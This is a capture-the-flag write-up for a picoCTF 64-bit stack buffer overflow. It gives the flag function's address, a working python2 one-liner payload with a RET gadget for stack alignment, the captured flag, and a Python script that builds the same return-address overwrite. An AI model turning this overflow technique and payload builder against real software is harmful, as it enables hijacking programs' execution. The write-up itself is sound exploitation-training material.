Let's try moving to 64-bit, but don't worry, we'll start easy. Overflow the buffer and change the return address to the flag function in this program.
Get the address of the flag function:
$ objdump -d vuln | grep flag
0000000000400767 <flag>:
Overflow the buffer with 64 bytes plus 8 bytes for the saved RBP, so that the next 8 bytes written land on the saved return address (the value popped into RIP when the vulnerable function returns). Jumping straight to flag crashed before any output, so I added the address of a RET gadget before the flag address; the extra 8-byte stack slot restores the 16-byte stack alignment that flag's libc calls expect on x86-64, and with it the exploit prints the flag on the shell server.
$ python2 -c "print('A'*72+'\xde\x05\x40'+'\x00'*5 + '\x67\x07\x40'+'\x00'*5)" | ./vuln
flag: picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_72d3e39f}
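The same payload built with proper 64-bit packing instead of hand-written '\x00' padding, as an added example (not part of the original writeup). It pulls the flag address out of a constructed copy of the objdump line shown above, inserts the RET gadget at 0x4005de from the payload above for stack alignment, and can be piped into ./vuln exactly like the python2 one-liner; the alignment explanation and the helper names are this example's own.

```python
import re
import struct
import sys

# Constructed sample of the `objdump -d vuln | grep flag` output quoted above.
# The first line is the symbol header; the second is a made-up instruction line
# included only to show that the parser ignores everything but the header.
OBJDUMP_SAMPLE = (
    "0000000000400767 <flag>:\n"
    "  400767:\t55                   \tpush   %rbp\n"
)

BUF_SIZE = 64          # bytes of buffer, as stated in the writeup
SAVED_RBP = 8          # saved frame pointer between the buffer and the return address
RET_GADGET = 0x4005DE  # lone `ret` used in the writeup's payload to realign the stack


def symbol_address(objdump_text, name):
    """Return the address of `<name>:` from `objdump -d` output, or None if absent."""
    pattern = re.compile(r"^([0-9a-fA-F]+) <" + re.escape(name) + r">:$", re.M)
    m = pattern.search(objdump_text)
    return int(m.group(1), 16) if m else None


def p64(value):
    """Pack a 64-bit value little-endian, the byte order of a saved return
    address on the x86-64 stack (replaces '\\xde\\x05\\x40' + '\\x00'*5)."""
    if not 0 <= value < 1 << 64:
        raise ValueError("address does not fit in 64 bits")
    return struct.pack("<Q", value)


def build_payload(target, offset=BUF_SIZE + SAVED_RBP, ret_gadget=None):
    """Pad up to the saved return address, optionally place a `ret` gadget there
    first (each extra 8-byte slot flips 16-byte stack alignment), then the target."""
    payload = b"A" * offset
    if ret_gadget is not None:
        payload += p64(ret_gadget)
    payload += p64(target)
    return payload


def return_address_slot(payload, offset=BUF_SIZE + SAVED_RBP):
    """Decode which address the payload writes over the saved return address."""
    return struct.unpack("<Q", payload[offset:offset + 8])[0]


if __name__ == "__main__":
    flag = symbol_address(OBJDUMP_SAMPLE, "flag")
    if flag is None:
        sys.exit("flag symbol not found in objdump output")
    # usage: python3 payload.py | ./vuln   (raw bytes, so write to the binary stdout)
    sys.stdout.buffer.write(build_payload(flag, ret_gadget=RET_GADGET))
```

If the gadget is left out (ret_gadget=None) the payload is 80 bytes and flag's address lands directly in the return slot, which is the variant that crashed before printing; with the gadget it is 88 bytes and byte-for-byte identical to the one-liner above.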